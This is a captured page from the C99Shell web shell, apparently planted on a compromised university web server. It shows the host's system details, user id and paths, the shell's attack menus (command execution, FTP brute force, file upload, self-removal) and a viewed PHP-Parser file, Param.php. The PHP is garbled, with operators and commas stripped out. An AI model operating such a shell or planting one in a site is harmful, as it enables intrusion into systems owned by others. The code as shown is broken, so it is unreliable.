!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/nikic/php-parser/lib/PhpParser/Builder/   drwxr-xr-x
Free 116.58 GB of 200.55 GB (58.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Param.php (1.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PhpParser\Builder;

use 
PhpParser;
use 
PhpParser\Node;

class 
Param extends PhpParser\BuilderAbstract
{
    protected 
$name;

    protected 
$default null;
    protected 
$type null;
    protected 
$byRef false;

    
/**
     * Creates a parameter builder.
     *
     * @param string $name Name of the parameter
     */
    
public function __construct($name) {
        
$this->name $name;
    }

    
/**
     * Sets default value for the parameter.
     *
     * @param mixed $value Default value to use
     *
     * @return $this The builder instance (for fluid interface)
     */
    
public function setDefault($value) {
        
$this->default $this->normalizeValue($value);

        return 
$this;
    }

    
/**
     * Sets type hint for the parameter.
     *
     * @param string|Node\Name $type Type hint to use
     *
     * @return $this The builder instance (for fluid interface)
     */
    
public function setTypeHint($type) {
        if (
in_array($type, array('array''callable''string''int''float''bool'))) {
            
$this->type $type;
        } else {
            
$this->type $this->normalizeName($type);
        }

        return 
$this;
    }

    
/**
     * Make the parameter accept the value by reference.
     *
     * @return $this The builder instance (for fluid interface)
     */
    
public function makeByRef() {
        
$this->byRef true;

        return 
$this;
    }

    
/**
     * Returns the built parameter node.
     *
     * @return Node\Param The built parameter node
     */
    
public function getNode() {
        return new 
Node\Param(
            
$this->name$this->default$this->type$this->byRef
        
);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0104 ]--